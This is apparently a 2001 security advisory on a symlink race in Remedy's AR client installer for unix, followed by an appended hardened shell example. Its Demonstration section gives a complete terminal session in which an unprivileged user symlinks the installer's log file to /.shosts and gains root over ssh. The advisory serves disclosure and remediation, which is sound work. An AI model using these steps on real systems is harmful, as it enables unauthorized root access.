Security Holes in Remedy Client Installer

Summary
-------

Due to improper handling of temporary files, the installer program for
Remedy Software's Action Request System client for unix can allow local
users to gain root privileges.

Details
-------

The installer script for the unix AR clients (ar_install) uses files with
predictable names in world-writeable locations to store temporary files
and logging information. The code does not check whether the files
already exist before writing to them, or whether they are symbolic links
to something else. A local user can exploit this (by symbolically linking
the target files to something else ahead of time) to create or overwrite
files anywhere on the system.

If the AR client is installed as root, this type of attack can be used by
unprivileged users to gain root access under the right circumstances
(e.g., a local user knows that the AR client will be installed on a
system in the near future).

There are several instances of this problem in ar_install. A few examples:

    # Name of the file to record a log of the installation into
    #
    LOGFILE="/usr/tmp/arClient_install.log"

    ...

    ############################################
    # lecho - Logged echo to stdout
    # Arg 0 to N = Data to be echoed
    ############################################
    lecho()
    {
        echo "$@" >> $LOGFILE
        echo "$@"
    }

The lecho function is then frequently used to write logging data to
$LOGFILE.

Another example:

    #
    # Test if "ex -" has any problem on this machine. If there is, use "ex"
    #
    echo "$PROD" > /tmp/ex.test
    ex - /tmp/ex.test << EOF
    /$PROD/
    s/$PROD/$PROD_LONG/
    w!
    q
    EOF
    RET=$?
    RES=`cat /tmp/ex.test`
    if [ \( $RET -eq 0 \) -a \( "$RES" = "$PROD_LONG" \) ]
    then
        EX="ex -"
    else
        EX="ex"
    fi

Demonstration
-------------

    $ hostname
    brokenhost
    $ id
    uid=5000(foo) gid=20(users)
    $ ln -s /.shosts /var/tmp/arClient_install.log
    $ ls -alt /var/tmp/arClient_install.log
    lrwxrwxrwx 1 foo users 8 Apr 12 14:57 /var/tmp/arClient_install.log -> /.shosts

    ...wait for root to run ar_install...

    $ ls -alt /.shosts
    -rw-rw-rw- 1 root other 50873 Apr 12 14:58 /.shosts
    $ cat > /.shosts
    brokenhost foo
    ^D
    $ ssh -l root brokenhost
    Last login: Thu Apr 12 14:50:30 from someotherhost
    Sun Microsystems Inc. SunOS 5.6 Generic August 1997
    brokenhost # id
    uid=0(root) gid=1(other)
    brokenhost #

Vulnerable Versions
-------------------

I have tested this on Solaris 2.6 and 8, using the installer for AR 4.5.1.
The installers for the other supported unix versions (Irix, AIX, HP/UX and
NCR System 3000) contain similar issues, so it's likely that they are
vulnerable as well.

The older versions of AR that are available for some platforms (3.2.1) use
a different install script. That script uses different filenames, but
appears to have similar flaws.

Workaround
----------

If the AR client is being installed on a single-user workstation, it can
be installed as a non-root user (this is not the default, but the
documentation explains how to do it).

If the AR client must be installed as root, ar_install can be trivially
modified to avoid using a world-readable/writeable space to store its
temporary files.

Vendor Notification
-------------------

The vendor was notified on 4/13/2001.

Copyright 4/12/2001, by echo8
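
One way to make the modification described under Workaround, replacing the LOGFILE/lecho pattern quoted under Details. This is an added example, not code from the advisory or from Remedy; the function names are hypothetical, and it assumes a system that provides mktemp(1).

```shell
#!/bin/sh
# Added example (not Remedy's code). Function names are hypothetical.

# Create a private work directory (mode 0700) with an unpredictable
# name, so no other local user can pre-create or plant links inside it.
# Assumes mktemp(1) is available. Prints the directory path.
make_workdir() {
    (umask 077 && mktemp -d "${TMPDIR:-/tmp}/ar_install.XXXXXX")
}

# Create the log file without clobbering anything. With noclobber
# (set -C) the ">" redirection fails if the path is an existing regular
# file, a symlink to one, or a dangling symlink, instead of writing
# through it. Returns non-zero on failure.
create_log() {
    (set -C; umask 077; : > "$1") 2>/dev/null
}

# Logged echo with the same interface as lecho, but it refuses to
# append when $LOGFILE is a symlink or is not a regular file.
safe_lecho() {
    if [ -L "$LOGFILE" ] || [ ! -f "$LOGFILE" ]; then
        echo "refusing to log to $LOGFILE" >&2
        return 1
    fi
    echo "$@" >> "$LOGFILE"
    echo "$@"
}

# Intended use inside an installer (shown as comments so that sourcing
# this file has no side effects):
#   WORKDIR=`make_workdir` || exit 1
#   LOGFILE="$WORKDIR/arClient_install.log"
#   create_log "$LOGFILE" || exit 1
#   EXTEST="$WORKDIR/ex.test"    # used in place of /tmp/ex.test
#   safe_lecho "Starting installation"
```

The private directory is the main defense; the noclobber and symlink checks are a second layer in case the log path is ever pointed back at a shared location.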